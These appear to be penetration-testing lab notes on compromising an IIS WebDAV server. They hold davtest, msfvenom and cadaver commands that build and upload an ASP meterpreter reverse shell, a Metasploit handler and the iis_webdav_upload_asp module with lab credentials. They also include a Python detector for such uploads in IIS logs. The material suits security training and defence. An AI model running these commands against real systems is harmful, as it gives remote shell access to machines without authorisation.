# msfvenom, Metasploit

First, use the `davtest` command to check which file formats the server supports.

```
davtest -auth username:password -url http://<target-ip>/webdav
```

## Msfvenom

In this case the server also supports `.asp` files, so generate a payload using `msfvenom`:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=1234 -f asp > shell.asp
```

* Use `cadaver` to upload the generated `shell.asp` payload to the `/webdav` directory

```
cadaver http://10.4.18.218/webdav
```

```
put /root/shell.asp
```

Before executing `shell.asp`, set up a **listener**/**handler** that will receive the reverse connection from the target and send the stage that provides a `meterpreter` session when executed.

* Open a new terminal tab and run Metasploit with database support

```
service postgresql start && msfconsole
```

* Set up a [Metasploit handler](https://www.rapid7.com/db/modules/exploit/multi/handler/), using the same payload, LHOST and LPORT provided to `msfvenom`

```
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.80.4
set LPORT 1234
run
```

* Open the `http://10.4.18.218/webdav` link in the browser and click on `shell.asp` file
* The **Meterpreter** session will be opened

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2FtE3tU9JMP8DE6HJrW8Wf%2Fimage.png?alt=media&#x26;token=ec9f92f4-4109-4615-8ddf-f2db7413e2ba" alt="" width="563"><figcaption></figcaption></figure>

* Use cadaver to delete the `shell.asp` uploaded file

```
cadaver http://10.4.18.218/webdav
delete shell.asp
```
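The manual steps above leave a recognisable sequence in the web server's access log: a successful `PUT` of a script file into the WebDAV directory, a later request for that file, then a `DELETE`. The following is an added example, not part of the original notes, that finds that sequence in an IIS W3C log; the log lines, field selection and extension list are constructed assumptions.

```python
"""Flag WebDAV script uploads in an IIS W3C log: PUT of a script, later request, DELETE."""
from collections import defaultdict

SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer")  # assumption: extensions the server executes

# Constructed sample log (not captured from a real server), IIS W3C extended format.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 10.4.18.218 PROPFIND /webdav/ bob 10.10.80.4 cadaver/0.23.3 207
2024-01-01 10:00:09 10.4.18.218 PUT /webdav/shell.asp bob 10.10.80.4 cadaver/0.23.3 201
2024-01-01 10:00:20 10.4.18.218 PUT /webdav/notes.txt bob 10.10.80.4 cadaver/0.23.3 201
2024-01-01 10:01:30 10.4.18.218 GET /webdav/shell.asp bob 10.10.80.4 Mozilla/5.0 200
2024-01-01 10:05:42 10.4.18.218 DELETE /webdav/shell.asp bob 10.10.80.4 cadaver/0.23.3 204
2024-01-01 10:06:00 10.4.18.218 GET /webdav/notes.txt bob 10.10.80.4 Mozilla/5.0 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the column order from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_script_uploads(text):
    """Return {uri: stage list} for script files written over WebDAV with a 2xx status."""
    stages = defaultdict(list)
    for r in parse_w3c(text):
        uri, method = r["cs-uri-stem"].lower(), r["cs-method"].upper()
        ok = r["sc-status"].startswith("2")
        if not (uri.endswith(SCRIPT_EXTS) and ok):
            continue
        if method == "PUT":
            stages[uri].append(("uploaded", r["time"], r["c-ip"], r["cs-username"]))
        elif uri in stages and method in ("GET", "POST"):
            stages[uri].append(("executed", r["time"], r["c-ip"], r["cs-username"]))
        elif uri in stages and method == "DELETE":
            stages[uri].append(("deleted", r["time"], r["c-ip"], r["cs-username"]))
    return dict(stages)

if __name__ == "__main__":
    for uri, events in find_script_uploads(SAMPLE_LOG).items():
        print(uri, [e[0] for e in events])
```

This block covers the `PUT` case only; a script renamed into place with `MOVE` needs its own rule.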

## Metasploit - automatic

* Use Metasploit [iis\_webdav\_upload\_asp](https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp/) module to get a `meterpreter` session on the target system.

```
service postgresql start && msfconsole
```

```
search iis upload
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.4.22.96	# Lab reset = IP changed
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit.asp
exploit
```

You will be provided with a `meterpreter` session.
